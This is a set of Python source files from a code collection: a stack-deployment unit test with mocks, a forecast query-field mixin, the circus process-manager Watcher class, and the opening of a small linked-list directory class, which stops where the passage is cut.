stack_api._download_resource(resource_badservice) def test_deploy_config(self, stack_api, tmpdir): """ The stack status generated from a correctly set up stack passed through deployment in stack_api should pass the validation assertions within the deployment procedure along with passing some correctness criteria that will be tested here. 
""" test_deploy_output = {'test': 'test'} # Setup mocks for job resource deployment stack_api._update_job = mock.MagicMock() stack_api._update_job.return_value = 12345 stack_api._put_job = mock.MagicMock() stack_api._put_job.return_value = 12345 stack_api.jobs_client.get_job = mock.MagicMock() stack_api.jobs_client.get_job.return_value = test_deploy_output # Setup mocks for workspace resource deployment stack_api.workspace_client.import_workspace = mock.MagicMock() stack_api.workspace_client.import_workspace_dir = mock.MagicMock() stack_api.workspace_client.client.get_status = mock.MagicMock() stack_api.workspace_client.client.get_status.return_value = test_deploy_output # Setup mocks for dbfs resource deployment stack_api.dbfs_client.cp = mock.MagicMock() stack_api.dbfs_client.client = mock.MagicMock() stack_api.dbfs_client.client.get_status.return_value = test_deploy_output # Create files and directories associated with workspace and dbfs resources to ensure # that validations within resource-specific services pass. test_stack = copy.deepcopy(TEST_STACK) for resource in test_stack[api.STACK_RESOURCES]: resource_service = resource[api.RESOURCE_SERVICE] resource_properties = resource[api.RESOURCE_PROPERTIES] curr_source_path = resource_properties.get(api.DBFS_RESOURCE_SOURCE_PATH, '') resource_properties.update( {api.DBFS_RESOURCE_SOURCE_PATH: os.path.join(tmpdir.strpath, curr_source_path)}) if resource_service == api.WORKSPACE_SERVICE: if workspace_api.NOTEBOOK == \ resource_properties[api.WORKSPACE_RESOURCE_OBJECT_TYPE]: os.makedirs(os.path.dirname(resource_properties[ api.WORKSPACE_RESOURCE_SOURCE_PATH])) with open(resource_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH], 'w') as f: f.write("print('test')\n") if resource_properties[api.WORKSPACE_RESOURCE_OBJECT_TYPE] == \ workspace_api.DIRECTORY: os.makedirs(resource_properties[api.WORKSPACE_RESOURCE_SOURCE_PATH]) elif resource_service == api.DBFS_SERVICE: if resource_properties[api.DBFS_RESOURCE_IS_DIR]: os.makedirs(resource_properties[api.DBFS_RESOURCE_SOURCE_PATH]) else: with open(resource_properties[api.DBFS_RESOURCE_SOURCE_PATH], 'w') as f: f.write("print('test')\n") new_stack_status_1 = stack_api.deploy(test_stack) test_job_status_1 = { api.RESOURCE_ID: TEST_RESOURCE_ID, api.RESOURCE_SERVICE: api.JOBS_SERVICE, api.RESOURCE_DATABRICKS_ID: {"job_id": 12345} } test_stack_status_1 = { api.STACK_NAME: "test-stack", api.CLI_VERSION_KEY: CLI_VERSION, api.STACK_DEPLOYED: [test_job_status_1, TEST_WORKSPACE_NB_STATUS, TEST_WORKSPACE_DIR_STATUS, TEST_DBFS_FILE_STATUS, TEST_DBFS_DIR_STATUS, ] } assert new_stack_status_1 == test_stack_status_1 # stack_api.deploy should create a valid stack status when given an existing # stack_status new_stack_status_2 = stack_api.deploy(test_stack, stack_status=TEST_STATUS) test_stack_status_2 = TEST_STATUS assert new_stack_status_2 == test_stack_status_2
the-stack_106_24324
from forecast.utils.query_fields import ForecastQueryFields class FigureFieldData: select_related_list = [ "financial_code", "financial_code__cost_centre", "financial_code__natural_account_code", "financial_code__programme", "financial_code__project_code", "financial_code__analysis1_code", "financial_code__analysis2_code", "financial_code__forecast_expenditure_type", ] chart_of_account_titles = [ "Cost Centre code", "Actual NAC", "Programme code", "Contract code", "Market code", "Project code", "Expenditure type", "Expenditure type description", ] def set_fields(self): # Define the access strings for the chart of account members needed # for actuals, forecasts and budgets figures self.fields = ForecastQueryFields() self.cost_centre_field = self.fields.cost_centre_code_field self.nac_field = self.fields.nac_code_field self.programme_field = self.fields.programme_code_field self.contract_field = self.fields.analysis1_code_field self.market_field = self.fields.analysis2_code_field self.project_field = self.fields.project_code_field self.expenditure_type_field = self.fields.expenditure_type_name_field self.expenditure_type_description_field = ( self.fields.expenditure_type_description_field ) self.chart_of_account_field_list = [ self.cost_centre_field, self.nac_field, self.programme_field, self.contract_field, self.market_field, self.project_field, self.expenditure_type_field, self.expenditure_type_description_field, ]
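

# Illustrative sketch (not part of the original module): how a consumer of the
# FigureFieldData mixin might pair each display title with the query field it
# describes after set_fields() has run. Instantiating ForecastQueryFields directly
# is assumed to work here; in practice this mixin is used inside views where the
# full Django application context is available. The function name is hypothetical.
def example_field_mapping():
    figure_fields = FigureFieldData()
    figure_fields.set_fields()
    # chart_of_account_titles and chart_of_account_field_list are parallel lists,
    # so zipping them yields a title -> field access string mapping.
    return dict(zip(figure_fields.chart_of_account_titles,
                    figure_fields.chart_of_account_field_list))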
the-stack_106_24325
import copy import errno import os import signal import time import sys import operator import datetime from random import randint try: from itertools import zip_longest as izip_longest except ImportError: from itertools import izip_longest # NOQA import site from tornado import gen from psutil import NoSuchProcess, TimeoutExpired import zmq.utils.jsonapi as json from zmq.eventloop import ioloop from circus.process import Process, DEAD_OR_ZOMBIE, UNEXISTING from circus import logger from circus import util from circus.stream import get_pipe_redirector, get_stream from circus.util import parse_env_dict, resolve_name, tornado_sleep, IS_WINDOWS from circus.py3compat import bytestring, is_callable, b, PY2 class Watcher(object): """ Class managing a list of processes for a given command. Options: - **name**: name given to the watcher. Used to uniquely identify it. - **cmd**: the command to run. May contain *$WID*, which will be replaced by **wid**. - **args**: the arguments for the command to run. Can be a list or a string. If **args** is a string, it's splitted using :func:`shlex.split`. Defaults to None. - **numprocesses**: Number of processes to run. - **working_dir**: the working directory to run the command in. If not provided, will default to the current working directory. - **shell**: if *True*, will run the command in the shell environment. *False* by default. **warning: this is a security hazard**. - **uid**: if given, is the user id or name the command should run with. The current uid is the default. - **gid**: if given, is the group id or name the command should run with. The current gid is the default. - **send_hup**: if True, a process reload will be done by sending the SIGHUP signal. Defaults to False. - **stop_signal**: the signal to send when stopping the process. Defaults to SIGTERM. - **stop_children**: send the **stop_signal** to the children too. Defaults to False. - **env**: a mapping containing the environment variables the command will run with. Optional. - **rlimits**: a mapping containing rlimit names and values that will be set before the command runs. - **stdout_stream**: a mapping that defines the stream for the process stdout. Defaults to None. Optional. When provided, *stdout_stream* is a mapping containing up to three keys: - **class**: the stream class. Defaults to `circus.stream.FileStream` - **filename**: the filename, if using a FileStream - **max_bytes**: maximum file size, after which a new output file is opened. defaults to 0 which means no maximum size (only applicable with FileStream). - **backup_count**: how many backups to retain when rotating files according to the max_bytes parameter. defaults to 0 which means no backups are made (only applicable with FileStream) This mapping will be used to create a stream callable of the specified class. Each entry received by the callable is a mapping containing: - **pid** - the process pid - **name** - the stream name (*stderr* or *stdout*) - **data** - the data This is not supported on Windows. - **stderr_stream**: a mapping that defines the stream for the process stderr. Defaults to None. Optional. When provided, *stderr_stream* is a mapping containing up to three keys: - **class**: the stream class. Defaults to `circus.stream.FileStream` - **filename**: the filename, if using a FileStream - **max_bytes**: maximum file size, after which a new output file is opened. 
defaults to 0 which means no maximum size (only applicable with FileStream) - **backup_count**: how many backups to retain when rotating files according to the max_bytes parameter. defaults to 0 which means no backups are made (only applicable with FileStream). This mapping will be used to create a stream callable of the specified class. Each entry received by the callable is a mapping containing: - **pid** - the process pid - **name** - the stream name (*stderr* or *stdout*) - **data** - the data This is not supported on Windows. - **priority** -- integer that defines a priority for the watcher. When the Arbiter do some operations on all watchers, it will sort them with this field, from the bigger number to the smallest. (default: 0) - **singleton** -- If True, this watcher has a single process. (default:False) - **use_sockets** -- If True, the processes will inherit the file descriptors, thus can reuse the sockets opened by circusd. (default: False) - **on_demand** -- If True, the processes will be started only at the first connection to the socket (default: False) - **copy_env** -- If True, the environment in which circus is running run will be reproduced for the workers. This defaults to True on Windows as you cannot run any executable without the **SYSTEMROOT** variable. (default: False) - **copy_path** -- If True, circusd *sys.path* is sent to the process through *PYTHONPATH*. You must activate **copy_env** for **copy_path** to work. (default: False) - **max_age**: If set after around max_age seconds, the process is replaced with a new one. (default: 0, Disabled) - **max_age_variance**: The maximum number of seconds that can be added to max_age. This extra value is to avoid restarting all processes at the same time. A process will live between max_age and max_age + max_age_variance seconds. - **hooks**: callback functions for hooking into the watcher startup and shutdown process. **hooks** is a dict where each key is the hook name and each value is a 2-tuple with the name of the callable or the callabled itself and a boolean flag indicating if an exception occuring in the hook should not be ignored. Possible values for the hook name: *before_start*, *after_start*, *before_spawn*, *after_spawn*, *before_stop*, *after_stop*., *before_signal*, *after_signal* or *extended_stats*. - **options** -- extra options for the worker. All options found in the configuration file for instance, are passed in this mapping -- this can be used by plugins for watcher-specific options. - **respawn** -- If set to False, the processes handled by a watcher will not be respawned automatically. (default: True) - **virtualenv** -- The root directory of a virtualenv. If provided, the watcher will load the environment for its execution. (default: None) - **close_child_stdout**: If True, closes the stdout after the fork. default: False. - **close_child_stderr**: If True, closes the stderr after the fork. default: False. 
""" def __init__(self, name, cmd, args=None, numprocesses=1, warmup_delay=0., working_dir=None, shell=False, shell_args=None, uid=None, max_retry=5, gid=None, send_hup=False, stop_signal=signal.SIGTERM, stop_children=False, env=None, graceful_timeout=30.0, prereload_fn=None, rlimits=None, executable=None, stdout_stream=None, stderr_stream=None, priority=0, loop=None, singleton=False, use_sockets=False, copy_env=False, copy_path=False, max_age=0, max_age_variance=30, hooks=None, respawn=True, autostart=True, on_demand=False, virtualenv=None, close_child_stdout=False, close_child_stderr=False, dependencies=None, upgradable=False, **options): self.name = name self.use_sockets = use_sockets self.on_demand = on_demand self.res_name = name.lower().replace(" ", "_") self.numprocesses = int(numprocesses) self.warmup_delay = warmup_delay self.cmd = cmd self.args = args self._status = "stopped" self.graceful_timeout = float(graceful_timeout) self.prereload_fn = prereload_fn self.executable = None self.priority = priority self.stdout_stream_conf = copy.copy(stdout_stream) self.stderr_stream_conf = copy.copy(stderr_stream) self.stdout_stream = get_stream(self.stdout_stream_conf) self.stderr_stream = get_stream(self.stderr_stream_conf) self.stdout_redirector = self.stderr_redirector = None self.max_retry = max_retry self._options = options self.singleton = singleton self.copy_env = copy_env self.copy_path = copy_path self.virtualenv = virtualenv self.max_age = int(max_age) self.max_age_variance = int(max_age_variance) self.ignore_hook_failure = ['before_stop', 'after_stop', 'before_signal', 'after_signal', 'extended_stats'] self.respawn = respawn self.autostart = autostart self.close_child_stdout = close_child_stdout self.close_child_stderr = close_child_stderr if dependencies is None: dependencies = [] self.dependencies = dependencies self.upgradable = upgradable self.loop = loop or ioloop.IOLoop.instance() if singleton and self.numprocesses not in (0, 1): raise ValueError("Cannot have %d processes with a singleton " " watcher" % self.numprocesses) if IS_WINDOWS: if self.stdout_stream or self.stderr_stream: raise NotImplementedError("Streams are not supported" " on Windows.") if not copy_env and not env: # Copy the env by default on Windows as we can't run any # executable without some env variables # Eventually, we could set only some required variables, # such as SystemRoot self.copy_env = True self.optnames = (("numprocesses", "warmup_delay", "working_dir", "uid", "gid", "send_hup", "stop_signal", "stop_children", "shell", "shell_args", "env", "max_retry", "cmd", "args", "graceful_timeout", "executable", "use_sockets", "priority", "copy_env", "singleton", "stdout_stream_conf", "on_demand", "stderr_stream_conf", "max_age", "max_age_variance", "close_child_stdout", "close_child_stderr") + tuple(options.keys())) if not working_dir: # working dir hasn't been set working_dir = util.get_working_dir() self.working_dir = working_dir self.processes = {} self.shell = shell self.shell_args = shell_args self.uid = uid self.gid = gid if self.copy_env: self.env = os.environ.copy() if self.copy_path: path = os.pathsep.join(sys.path) self.env['PYTHONPATH'] = path if env is not None: self.env.update(env) else: if self.copy_path: raise ValueError(('copy_env and copy_path must have the ' 'same value')) self.env = env if self.virtualenv: util.load_virtualenv(self) # load directories in PYTHONPATH if provided # so if a hook is there, it can be loaded if self.env is not None and 'PYTHONPATH' in self.env: for path in 
self.env['PYTHONPATH'].split(os.pathsep): if path in sys.path: continue site.addsitedir(path) self.rlimits = rlimits self.send_hup = send_hup self.stop_signal = stop_signal self.stop_children = stop_children self.sockets = self.evpub_socket = None self.arbiter = None self.hooks = {} self._resolve_hooks(hooks) def _reload_hook(self, key, hook, ignore_error): hook_name = key.split('.')[-1] self._resolve_hook(hook_name, hook, ignore_error, reload_module=True) def _reload_stream(self, key, val): parts = key.split('.', 1) action = 0 if parts[0] == 'stdout_stream': old_stream = self.stdout_stream self.stdout_stream_conf[parts[1]] = val self.stdout_stream = get_stream(self.stdout_stream_conf, reload=True) if self.stdout_redirector: self.stdout_redirector.redirect = self.stdout_stream['stream'] else: self.stdout_redirector = get_pipe_redirector( self.stdout_stream, loop=self.loop) self.stdout_redirector.start() action = 1 if old_stream and hasattr(old_stream['stream'], 'close'): old_stream['stream'].close() else: old_stream = self.stderr_stream self.stderr_stream_conf[parts[1]] = val self.stderr_stream = get_stream(self.stderr_stream_conf, reload=True) if self.stderr_redirector: self.stderr_redirector.redirect = self.stderr_stream['stream'] else: self.stderr_redirector = get_pipe_redirector( self.stderr_stream, loop=self.loop) self.stderr_redirector.start() action = 1 if old_stream and hasattr(old_stream['stream'], 'close'): old_stream['stream'].close() return action def _create_redirectors(self): if self.stdout_stream: if self.stdout_redirector is not None: self.stdout_redirector.stop() self.stdout_redirector = get_pipe_redirector( self.stdout_stream, loop=self.loop) else: self.stdout_redirector = None if self.stderr_stream: if self.stderr_redirector is not None: self.stderr_redirector.stop() self.stderr_redirector = get_pipe_redirector( self.stderr_stream, loop=self.loop) else: self.stderr_redirector = None def _resolve_hook(self, name, callable_or_name, ignore_failure, reload_module=False): if is_callable(callable_or_name): self.hooks[name] = callable_or_name else: # will raise ImportError on failure self.hooks[name] = resolve_name(callable_or_name, reload=reload_module) if ignore_failure: self.ignore_hook_failure.append(name) def _resolve_hooks(self, hooks): """Check the supplied hooks argument to make sure we can find callables""" if hooks is None: return for name, (callable_or_name, ignore_failure) in hooks.items(): self._resolve_hook(name, callable_or_name, ignore_failure) @property def pending_socket_event(self): return self.on_demand and not self.arbiter.socket_event @classmethod def load_from_config(cls, config): if 'env' in config: config['env'] = parse_env_dict(config['env']) cfg = config.copy() w = cls(name=config.pop('name'), cmd=config.pop('cmd'), **config) w._cfg = cfg return w @util.debuglog def initialize(self, evpub_socket, sockets, arbiter): self.evpub_socket = evpub_socket self.sockets = sockets self.arbiter = arbiter def __len__(self): return len(self.processes) def notify_event(self, topic, msg): """Publish a message on the event publisher channel""" name = bytestring(self.res_name) multipart_msg = [b("watcher.%s.%s" % (name, topic)), json.dumps(msg)] if self.evpub_socket is not None and not self.evpub_socket.closed: self.evpub_socket.send_multipart(multipart_msg) @util.debuglog def reap_process(self, pid, status=None): """ensure that the process is killed (and not a zombie)""" if pid not in self.processes: return process = self.processes.pop(pid) timeout = 0.001 while 
status is None: if IS_WINDOWS: try: # On Windows we can't use waitpid as it's blocking, # so we use psutils' wait status = process.wait(timeout=timeout) except TimeoutExpired: continue else: try: _, status = os.waitpid(pid, os.WNOHANG) except OSError as e: if e.errno == errno.EAGAIN: time.sleep(timeout) continue elif e.errno == errno.ECHILD: status = None else: raise if status is None: # nothing to do here, we do not have any child # process running # but we still need to send the "reap" signal. # # This can happen if poll() or wait() were called on # the underlying process. logger.debug('reaping already dead process %s [%s]', pid, self.name) self.notify_event( "reap", {"process_pid": pid, "time": time.time(), "exit_code": process.returncode()}) process.stop() return # get return code if hasattr(os, 'WIFSIGNALED'): exit_code = 0 if os.WIFSIGNALED(status): # The Python Popen object returns <-signal> in it's returncode # property if the process exited on a signal, so emulate that # behavior here so that pubsub clients watching for reap can # distinguish between an exit with a non-zero exit code and # a signal'd exit. This is also consistent with the notify # event reap message above that uses the returncode function # (that ends up calling Popen.returncode) exit_code = -os.WTERMSIG(status) # process exited using exit(2) system call; return the # integer exit(2) system call has been called with elif os.WIFEXITED(status): exit_code = os.WEXITSTATUS(status) else: # should never happen raise RuntimeError("Unknown process exit status") else: # On Windows we don't have such distinction exit_code = status # if the process is dead or a zombie try to definitely stop it. if process.status in (DEAD_OR_ZOMBIE, UNEXISTING): process.stop() logger.debug('reaping process %s [%s]', pid, self.name) self.notify_event("reap", {"process_pid": pid, "time": time.time(), "exit_code": exit_code}) @util.debuglog def reap_processes(self): """Reap all the processes for this watcher. 
""" if self.is_stopped(): logger.debug('do not reap processes as the watcher is stopped') return # reap_process changes our dict, look through the copy of keys for pid in list(self.processes.keys()): self.reap_process(pid) @gen.coroutine @util.debuglog def manage_processes(self): """Manage processes.""" if self.is_stopped(): return # remove dead or zombie processes first for process in list(self.processes.values()): if process.status in (DEAD_OR_ZOMBIE, UNEXISTING): self.processes.pop(process.pid) if self.max_age: yield self.remove_expired_processes() # adding fresh processes if len(self.processes) < self.numprocesses and not self.is_stopping(): if self.respawn: yield self.spawn_processes() elif not len(self.processes) and not self.on_demand: yield self._stop() # removing extra processes if len(self.processes) > self.numprocesses: processes_to_kill = [] for process in sorted(self.processes.values(), key=lambda process: process.started, reverse=True)[self.numprocesses:]: if process.status in (DEAD_OR_ZOMBIE, UNEXISTING): self.processes.pop(process.pid) else: processes_to_kill.append(process) removes = yield [self.kill_process(process) for process in processes_to_kill] for i, process in enumerate(processes_to_kill): if removes[i]: self.processes.pop(process.pid) @gen.coroutine @util.debuglog def remove_expired_processes(self): max_age = self.max_age + randint(0, self.max_age_variance) expired_processes = [p for p in self.processes.values() if p.age() > max_age] removes = yield [self.kill_process(x) for x in expired_processes] for i, process in enumerate(expired_processes): if removes[i]: self.processes.pop(process.pid) @gen.coroutine @util.debuglog def reap_and_manage_processes(self): """Reap & manage processes.""" if self.is_stopped(): return self.reap_processes() yield self.manage_processes() @gen.coroutine @util.debuglog def spawn_processes(self): """Spawn processes. """ # when an on_demand process dies, do not restart it until # the next event if self.pending_socket_event: self._status = "stopped" return for i in range(self.numprocesses - len(self.processes)): res = self.spawn_process() if res is False: yield self._stop() break yield tornado_sleep(self.warmup_delay) def _get_sockets_fds(self): # XXX should be cached if self.sockets is None: return {} fds = {} for name, sock in self.sockets.items(): fds[name] = sock.fileno() return fds def spawn_process(self): """Spawn process. 
Return True if ok, False if the watcher must be stopped """ if self.is_stopped(): return True if not self.call_hook('before_spawn'): return False cmd = util.replace_gnu_args(self.cmd, env=self.env) nb_tries = 0 while nb_tries < self.max_retry or self.max_retry == -1: process = None pipe_stdout = self.stdout_redirector is not None pipe_stderr = self.stderr_redirector is not None try: process = Process(self._nextwid, cmd, args=self.args, working_dir=self.working_dir, shell=self.shell, uid=self.uid, gid=self.gid, env=self.env, rlimits=self.rlimits, executable=self.executable, use_fds=self.use_sockets, watcher=self, pipe_stdout=pipe_stdout, pipe_stderr=pipe_stderr, close_child_stdout=self.close_child_stdout, close_child_stderr=self.close_child_stderr) # stream stderr/stdout if configured if pipe_stdout and self.stdout_redirector is not None: self.stdout_redirector.add_redirection('stdout', process, process.stdout) if pipe_stderr and self.stderr_redirector is not None: self.stderr_redirector.add_redirection('stderr', process, process.stderr) self.processes[process.pid] = process logger.debug('running %s process [pid %d]', self.name, process.pid) if not self.call_hook('after_spawn', pid=process.pid): self.kill_process(process) del self.processes[process.pid] return False except OSError as e: logger.warning('error in %r: %s', self.name, str(e)) if process is None: nb_tries += 1 continue else: self.notify_event("spawn", {"process_pid": process.pid, "time": time.time()}) return True return False @util.debuglog def send_signal_process(self, process, signum): """Send the signum signal to the process The signal is sent to the process itself then to all the children """ children = None try: # getting the process children children = process.children() # sending the signal to the process itself self.send_signal(process.pid, signum) self.notify_event("kill", {"process_pid": process.pid, "time": time.time()}) except NoSuchProcess: # already dead ! if children is None: return # now sending the same signal to all the children for child_pid in children: try: process.send_signal_child(child_pid, signum) self.notify_event("kill", {"process_pid": child_pid, "time": time.time()}) except NoSuchProcess: # already dead ! 
pass def _process_remove_redirections(self, process): """Remove process redirections """ if self.stdout_redirector is not None and process.stdout is not None: self.stdout_redirector.remove_redirection(process.stdout) if self.stderr_redirector is not None and process.stderr is not None: self.stderr_redirector.remove_redirection(process.stderr) @gen.coroutine @util.debuglog def kill_process(self, process): """Kill process (stop_signal, graceful_timeout then SIGKILL) """ if process.stopping: raise gen.Return(False) try: logger.debug("%s: kill process %s", self.name, process.pid) if self.stop_children: self.send_signal_process(process, self.stop_signal) else: self.send_signal(process.pid, self.stop_signal) self.notify_event("kill", {"process_pid": process.pid, "time": time.time()}) except NoSuchProcess: raise gen.Return(False) process.stopping = True waited = 0 while waited < self.graceful_timeout: if not process.is_alive(): break yield tornado_sleep(0.1) waited += 0.1 if waited >= self.graceful_timeout: # On Windows we can't send a SIGKILL signal, but the # process.stop function will terminate the process # later anyway if hasattr(signal, 'SIGKILL'): # We are not smart anymore self.send_signal_process(process, signal.SIGKILL) self._process_remove_redirections(process) process.stopping = False process.stop() raise gen.Return(True) @gen.coroutine @util.debuglog def kill_processes(self): """Kill all processes (stop_signal, graceful_timeout then SIGKILL) """ active_processes = self.get_active_processes() try: yield [self.kill_process(process) for process in active_processes] except OSError as e: if e.errno != errno.ESRCH: raise @util.debuglog def send_signal(self, pid, signum): is_sigkill = hasattr(signal, 'SIGKILL') and signum == signal.SIGKILL if pid in self.processes: process = self.processes[pid] hook_result = self.call_hook("before_signal", pid=pid, signum=signum) if not is_sigkill and not hook_result: logger.debug("before_signal hook didn't return True " "=> signal %i is not sent to %i" % (signum, pid)) else: process.send_signal(signum) self.call_hook("after_signal", pid=pid, signum=signum) else: logger.debug('process %s does not exist' % pid) @util.debuglog def send_signal_child(self, pid, child_id, signum): """Send signal to a child. """ process = self.processes[pid] try: process.send_signal_child(int(child_id), signum) except OSError as e: if e.errno != errno.ESRCH: raise @util.debuglog def send_signal_children(self, pid, signum): """Send signal to all children. 
""" process = self.processes[int(pid)] process.send_signal_children(signum) @util.debuglog def status(self): watcher_status = self._status process_list = [] for pid, process in sorted(self.processes.iteritems(), key=operator.itemgetter(0)): status = process.status_name info = process.info() if info == 'No such process (stopped?)': age = 'N/A' else: age = datetime.timedelta(seconds=info['age']) datum = { 'pid': pid, 'status': status, 'uptime': str(age), } process_list.append(datum) return {'watcher': watcher_status, 'processes': process_list} @util.debuglog def process_info(self, pid, extended=False): process = self.processes[int(pid)] result = process.info() if extended and 'extended_stats' in self.hooks: self.hooks['extended_stats'](self, self.arbiter, 'extended_stats', pid=pid, stats=result) return result @util.debuglog def info(self, extended=False): result = dict([(proc.pid, proc.info()) for proc in self.processes.values()]) if extended and 'extended_stats' in self.hooks: for pid, stats in result.items(): self.hooks['extended_stats'](self, self.arbiter, 'extended_stats', pid=pid, stats=stats) return result @util.synchronized("watcher_stop") @gen.coroutine def stop(self): yield self._stop() @util.debuglog @gen.coroutine def _stop(self, close_output_streams=False): if self.is_stopped(): return self._status = "stopping" logger.debug('stopping the %s watcher' % self.name) logger.debug('gracefully stopping processes [%s] for %ss' % ( self.name, self.graceful_timeout)) # We ignore the hook result self.call_hook('before_stop') yield self.kill_processes() self.reap_processes() # stop redirectors if self.stdout_redirector is not None: self.stdout_redirector.stop() self.stdout_redirector = None if self.stderr_redirector is not None: self.stderr_redirector.stop() self.stderr_redirector = None if close_output_streams: if self.stdout_stream and hasattr(self.stdout_stream['stream'], 'close'): self.stdout_stream['stream'].close() if self.stderr_stream and hasattr(self.stderr_stream['stream'], 'close'): self.stderr_stream['stream'].close() # notify about the stop if self.evpub_socket is not None: self.notify_event("stop", {"time": time.time()}) self._status = "stopped" # We ignore the hook result self.call_hook('after_stop') logger.info('%s stopped', self.name) def get_active_processes(self): """return a list of pids of active processes (not already stopped)""" return [p for p in self.processes.values() if p.status not in (DEAD_OR_ZOMBIE, UNEXISTING)] def get_active_pids(self): """return a list of pids of active processes (not already stopped)""" return [p.pid for p in self.processes.values() if p.status not in (DEAD_OR_ZOMBIE, UNEXISTING)] @property def pids(self): """Returns a list of PIDs""" return [process.pid for process in self.processes] @property def _nextwid(self): used_wids = set([p.wid for p in self.processes.values()]) all_wids = set(range(1, self.numprocesses * 2 + 1)) available_wids = sorted(all_wids - used_wids) try: return available_wids[0] except IndexError: raise RuntimeError("Process count > numproceses*2") def call_hook(self, hook_name, **kwargs): """Call a hook function""" hook_kwargs = {'watcher': self, 'arbiter': self.arbiter, 'hook_name': hook_name} hook_kwargs.update(kwargs) if hook_name in self.hooks: try: result = self.hooks[hook_name](**hook_kwargs) self.notify_event("hook_success", {"name": hook_name, "time": time.time()}) except Exception as error: logger.exception('Hook %r failed' % hook_name) result = hook_name in self.ignore_hook_failure 
self.notify_event("hook_failure", {"name": hook_name, "time": time.time(), "error": str(error)}) return result else: return True @util.synchronized("watcher_start") @gen.coroutine def start(self): before_pids = set() if self.is_stopped() else set(self.processes) yield self._start() after_pids = set(self.processes) raise gen.Return({'started': sorted(after_pids - before_pids), 'kept': sorted(after_pids & before_pids)}) @gen.coroutine @util.debuglog def _start(self): """Start. """ if self.pending_socket_event: return if not self.is_stopped(): if len(self.processes) < self.numprocesses: self.reap_processes() yield self.spawn_processes() return if not self.call_hook('before_start'): logger.debug('Aborting startup') return self._status = "starting" self._create_redirectors() yield self.spawn_processes() # If not self.processes, the before_spawn or after_spawn hooks have # probably prevented startup so give up if not self.processes or not self.call_hook('after_start'): logger.debug('Aborting startup') yield self._stop() return if self.stdout_redirector is not None: self.stdout_redirector.start() if self.stderr_redirector is not None: self.stderr_redirector.start() self._status = "active" logger.info('%s started' % self.name) self.notify_event("start", {"time": time.time()}) @util.synchronized("watcher_restart") @gen.coroutine def restart(self): before_pids = set() if self.is_stopped() else set(self.processes) yield self._restart() after_pids = set(self.processes) raise gen.Return({'stopped': sorted(before_pids - after_pids), 'started': sorted(after_pids - before_pids), 'kept': sorted(after_pids & before_pids)}) @gen.coroutine @util.debuglog def _restart(self): yield self._stop() yield self._start() @util.synchronized("watcher_reload") @gen.coroutine def reload(self, graceful=True, sequential=False): before_pids = set() if self.is_stopped() else set(self.processes) yield self._reload(graceful=graceful, sequential=sequential) after_pids = set(self.processes) raise gen.Return({'stopped': sorted(before_pids - after_pids), 'started': sorted(after_pids - before_pids), 'kept': sorted(after_pids & before_pids)}) @gen.coroutine @util.debuglog def _reload(self, graceful=True, sequential=False): """ reload """ if not(graceful) and sequential: logger.warn("with graceful=False, sequential=True is ignored") if self.prereload_fn is not None: self.prereload_fn(self) if not graceful: yield self._restart() return if self.is_stopped(): yield self._start() elif self.send_hup: for process in self.processes.values(): logger.info("SENDING HUP to %s" % process.pid) process.send_signal(signal.SIGHUP) else: if sequential: active_processes = self.get_active_processes() for process in active_processes: yield self.kill_process(process) self.reap_process(process.pid) self.spawn_process() yield tornado_sleep(self.warmup_delay) else: for i in range(self.numprocesses): self.spawn_process() yield self.manage_processes() self.notify_event("reload", {"time": time.time()}) logger.info('%s reloaded', self.name) @gen.coroutine def set_numprocesses(self, np): if np < 0: np = 0 if self.singleton and np > 1: raise ValueError('Singleton watcher has a single process') self.numprocesses = np yield self.manage_processes() raise gen.Return(self.numprocesses) @util.synchronized("watcher_incr") @gen.coroutine @util.debuglog def incr(self, nb=1): res = yield self.set_numprocesses(self.numprocesses + nb) raise gen.Return(res) @util.synchronized("watcher_decr") @gen.coroutine @util.debuglog def decr(self, nb=1): res = yield 
self.set_numprocesses(self.numprocesses - nb) raise gen.Return(res) @util.synchronized("watcher_set_opt") def set_opt(self, key, val): """Set a watcher option. This function set the watcher options. unknown keys are ignored. This function returns an action number: - 0: trigger the process management - 1: trigger a graceful reload of the processes; """ action = 0 if key in self._options: self._options[key] = val action = -1 # XXX for now does not trigger a reload elif key == "numprocesses": val = int(val) if val < 0: val = 0 if self.singleton and val > 1: raise ValueError('Singleton watcher has a single process') self.numprocesses = val elif key == "warmup_delay": self.warmup_delay = float(val) elif key == "working_dir": self.working_dir = val action = 1 elif key == "uid": self.uid = util.to_uid(val) action = 1 elif key == "gid": self.gid = util.to_gid(val) action = 1 elif key == "send_hup": self.send_hup = val elif key == "stop_signal": self.stop_signal = util.to_signum(val) elif key == "stop_children": self.stop_children = util.to_bool(val) elif key == "shell": self.shell = val action = 1 elif key == "env": if PY2 and IS_WINDOWS: # Windows on Python 2 does not accept Unicode values # in env dictionary self.env = dict((b(k), b(v)) for k, v in val.iteritems()) else: self.env = val action = 1 elif key == "cmd": self.cmd = val action = 1 elif key == "args": self.args = val action = 1 elif key == "graceful_timeout": self.graceful_timeout = float(val) action = -1 elif key == "max_age": self.max_age = int(val) action = 1 elif key == "max_age_variance": self.max_age_variance = int(val) action = 1 elif (key.startswith('stdout_stream') or key.startswith('stderr_stream')): action = self._reload_stream(key, val) elif key.startswith('hooks'): val = val.split(',') if len(val) == 2: ignore_error = util.to_bool(val[1]) else: ignore_error = False hook = val[0] self._reload_hook(key, hook, ignore_error) action = 0 # send update event self.notify_event("updated", {"time": time.time()}) return action @util.synchronized("watcher_do_action") @gen.coroutine def do_action(self, num): # trigger needed action if num == 0: yield self.manage_processes() elif not self.is_stopped(): # graceful restart yield self._reload() @util.debuglog def options(self, *args): options = [] for name in sorted(self.optnames): if name in self._options: options.append((name, self._options[name])) else: options.append((name, getattr(self, name))) return options def is_stopping(self): return self._status == 'stopping' def is_stopped(self): return self._status == 'stopped' def is_active(self): return self._status == 'active' def is_upgradable(self): return self.upgradable
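

# Illustrative sketch (not part of circus): constructing a Watcher directly with a
# few of the options documented in the class docstring above. In a real deployment
# the arbiter builds watchers from the circus configuration; the name, command and
# log path below are made up. The stream mapping relies on the documented default
# stream class (circus.stream.FileStream) by omitting the "class" key, and streams
# are not supported on Windows, so a POSIX host is assumed.
def _example_watcher(loop=None):
    return Watcher(
        name="webapp",
        cmd="python -m http.server 8000",
        numprocesses=2,
        working_dir="/tmp",
        copy_env=True,
        graceful_timeout=10.0,
        stdout_stream={
            "filename": "/tmp/webapp.stdout.log",
            "max_bytes": 1048576,   # rotate after ~1 MB
            "backup_count": 3,      # keep three rotated files
        },
        loop=loop,
    )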
the-stack_106_24326
class No:
    """Singly linked list node holding one path component."""

    def __init__(self, value):
        self.value = value
        self.next = None


class Diretorio:
